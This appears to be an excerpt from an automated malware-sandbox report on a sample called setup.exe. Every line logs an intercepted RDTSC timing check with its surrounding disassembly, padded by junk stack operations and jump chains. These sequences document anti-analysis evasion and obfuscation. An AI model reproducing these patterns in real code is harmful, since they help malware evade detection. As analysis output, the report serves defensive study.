                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F322 second address: 57F328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57FD43 second address: 57FDA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F808D4B80C2h 0x00000010 jnl 00007F808D4B80BCh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a pushad 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f jnp 00007F808D4B80BCh 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push edi 0x00000029 jnl 00007F808D4B80BCh 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F808D4B80C0h 0x0000003d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57FDA6 second address: 57FDAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57FEEE second address: 57FF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D180Ah], eax 0x0000000f lea eax, dword ptr [ebp+124837D3h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F808D4B80B8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2508h], ecx 0x00000035 nop 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57FF30 second address: 57FF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57FF34 second address: 57FF50 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F808D4B80C4h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57FF50 second address: 57FF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57FF54 second address: 57FF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE0EC second address: 5CE0F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE0F0 second address: 5CE102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F808D4B80B6h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE102 second address: 5CE106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE20D second address: 5CE213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE213 second address: 5CE217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE217 second address: 5CE223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE223 second address: 5CE229 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE229 second address: 5CE254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F808D4B80C3h 0x0000000c jmp 00007F808D4B80BFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE254 second address: 5CE263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F808D280526h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE263 second address: 5CE26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F808D4B80B6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE584 second address: 5CE588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE588 second address: 5CE592 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F808D4B80B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE592 second address: 5CE59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE59B second address: 5CE5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C8h 0x00000009 pop edi 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE5B8 second address: 5CE5D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280536h 0x00000007 jnp 00007F808D280532h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5CE5D8 second address: 5CE5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D29C4 second address: 5D29D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jp 00007F808D280526h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D2292 second address: 5D2297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D2658 second address: 5D2690 instructions: 0x00000000 rdtsc 0x00000002 js 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F808D28052Dh 0x00000010 jmp 00007F808D280531h 0x00000015 jmp 00007F808D28052Eh 0x0000001a popad 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5D6083 second address: 5D6093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DCC52 second address: 5DCC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F808D280526h 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DCC5F second address: 5DCC66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DCC66 second address: 5DCC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jno 00007F808D280526h 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DCC7C second address: 5DCC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DB5B3 second address: 5DB5CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280537h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DB5CE second address: 5DB5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jo 00007F808D4B80C2h 0x0000000d jo 00007F808D4B80BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBC95 second address: 5DBC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBC9A second address: 5DBCA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBCA2 second address: 5DBCA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBCA6 second address: 5DBCB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F824 second address: 57F82F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F808D280526h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F82F second address: 57F87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor dword ptr [ebp+124583DFh], ebx 0x0000000e mov ebx, dword ptr [ebp+12483812h] 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F808D4B80B8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e add eax, ebx 0x00000030 mov dword ptr [ebp+122D21C2h], ebx 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 jl 00007F808D4B80BCh 0x0000003f jbe 00007F808D4B80B6h 0x00000045 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F87C second address: 57F893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F808D28052Ah 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F893 second address: 57F8D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F808D4B80B8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 movzx edx, ax 0x00000026 push 00000004h 0x00000028 mov dword ptr [ebp+122D17FAh], eax 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F8D2 second address: 57F8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F8D6 second address: 57F8DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F8DC second address: 57F8E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F8E1 second address: 57F8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F8E7 second address: 57F906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007F808D280530h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 57F906 second address: 57F90A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBE2D second address: 5DBE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edi 0x0000000b pushad 0x0000000c jne 00007F808D280539h 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F808D280526h 0x0000001a jl 00007F808D280526h 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBE60 second address: 5DBE64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBF75 second address: 5DBF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBF79 second address: 5DBF85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F808D4B80B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBF85 second address: 5DBF9E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F808D28053Bh 0x00000008 jmp 00007F808D28052Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBF9E second address: 5DBFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F808D4B80C8h 0x00000011 jmp 00007F808D4B80BBh 0x00000016 jmp 00007F808D4B80BAh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F808D4B80BAh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBFF0 second address: 5DBFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DBFF4 second address: 5DBFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DFD75 second address: 5DFD8F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F808D280532h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 535062 second address: 53508B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F808D4B80C0h 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 53508B second address: 535091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 535091 second address: 5350AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push edx 0x00000007 ja 00007F808D4B80BCh 0x0000000d jp 00007F808D4B80D2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5DFA63 second address: 5DFA79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3D97 second address: 5E3D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3D9B second address: 5E3DA5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F808D280526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3334 second address: 5E333A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E333A second address: 5E3346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F808D280526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3346 second address: 5E3360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F808D4B80BFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3360 second address: 5E3364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3364 second address: 5E3368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3368 second address: 5E3378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F808D280526h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E34C1 second address: 5E34C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3634 second address: 5E363A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E363A second address: 5E363E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E363E second address: 5E3655 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3655 second address: 5E3659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3659 second address: 5E3679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jns 00007F808D280532h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E3679 second address: 5E367D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5E399D second address: 5E39A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA3F5 second address: 5EA43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F808D4B80D2h 0x00000011 jmp 00007F808D4B80C6h 0x00000016 jl 00007F808D4B80B6h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA89F second address: 5EA8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D280536h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jne 00007F808D280526h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA8C5 second address: 5EA8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EA8CD second address: 5EA8D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EABBE second address: 5EABC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EB1B5 second address: 5EB1BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EB1BA second address: 5EB1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F808D4B80B6h 0x0000000a popad 0x0000000b jmp 00007F808D4B80C8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F808D4B80B6h 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EB9CD second address: 5EB9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F808D280526h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EB9D7 second address: 5EB9DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EBFAB second address: 5EBFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5EBFB0 second address: 5EBFBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F808D4B80B6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F11C0 second address: 5F11C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F11C4 second address: 5F11E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F808D4B80C3h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F11E4 second address: 5F11E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F11E8 second address: 5F11EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0351 second address: 5F0357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F0357 second address: 5F0366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BBh 0x00000009 rdtsc
